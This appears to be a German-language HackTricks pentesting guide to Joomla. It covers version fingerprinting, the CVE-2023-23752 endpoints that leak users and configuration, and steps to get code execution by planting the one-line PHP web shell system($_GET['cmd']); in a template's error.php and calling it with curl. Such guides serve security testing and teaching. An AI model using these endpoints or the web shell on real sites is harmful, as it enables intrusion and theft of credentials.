Joomla
Last updated
Last updated
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Vertiefen Sie Ihr Fachwissen in Mobiler Sicherheit mit der 8kSec Academy. Meistern Sie die Sicherheit von iOS und Android durch unsere selbstgesteuerten Kurse und erhalten Sie ein Zertifikat:
Joomla sammelt einige anonyme Nutzungsstatistiken, wie die Verteilung der Joomla-, PHP- und Datenbankversionen sowie der verwendeten Serverbetriebssysteme in Joomla-Installationen. Diese Daten können über ihre öffentliche API abgefragt werden.
Überprüfen Sie die Meta
robots.txt
README.txt
In /administrator/manifests/files/joomla.xml können Sie die Version sehen.
In /language/en-GB/en-GB.xml können Sie die Version von Joomla abrufen.
In plugins/system/cache/cache.xml können Sie eine ungefähre Version sehen.
In 80,443 - Pentesting Web Methodology ist ein Abschnitt über CMS-Scanner, die Joomla scannen können.
Versionen von 4.0.0 bis 4.2.7 sind anfällig für unauthentifizierte Informationsoffenlegung (CVE-2023-23752), die Anmeldeinformationen und andere Informationen ausgibt.
Benutzer: http://<host>/api/v1/users?public=true
Konfigurationsdatei: http://<host>/api/index.php/v1/config/application?public=true
MSF-Modul: scanner/http/joomla_api_improper_access_checks
oder Ruby-Skript: 51334
Sie können dieses Skript verwenden, um zu versuchen, sich mit Brute-Force in das Login einzuloggen.
Wenn Sie es geschafft haben, Admin-Anmeldeinformationen zu erhalten, können Sie RCE darin erreichen, indem Sie einen Ausschnitt von PHP-Code hinzufügen, um RCE zu erlangen. Wir können dies tun, indem wir ein Template anpassen.
Klicken Sie auf Templates
unten links unter Configuration
, um das Template-Menü aufzurufen.
Klicken Sie auf einen Template-Namen. Wählen wir protostar
unter der Spaltenüberschrift Template
. Dies bringt uns zur Seite Templates: Customise
.
Schließlich können Sie auf eine Seite klicken, um den Seitenquelltext aufzurufen. Wählen wir die error.php
-Seite. Wir fügen eine PHP-Einzeiler hinzu, um die Codeausführung zu erlangen wie folgt:
system($_GET['cmd']);
Speichern & Schließen
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Joomla-Ausnutzungsskript, das XSS zu RCE oder anderen kritischen Schwachstellen erhöht. Für weitere Informationen siehe diesen Beitrag. Es bietet Unterstützung für Joomla-Versionen 5.X.X, 4.X.X und 3.X.X und ermöglicht:
Privilegieneskalation: Erstellt einen Benutzer in Joomla.
(RCE) Eingebaute Templates bearbeiten: Bearbeitet eingebaute Templates in Joomla.
(Custom) Benutzerdefinierte Exploits: Benutzerdefinierte Exploits für Drittanbieter-Joomla-Plugins.
Vertiefen Sie Ihr Fachwissen in Mobile Security mit der 8kSec Academy. Meistern Sie die Sicherheit von iOS und Android durch unsere selbstgesteuerten Kurse und lassen Sie sich zertifizieren:
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)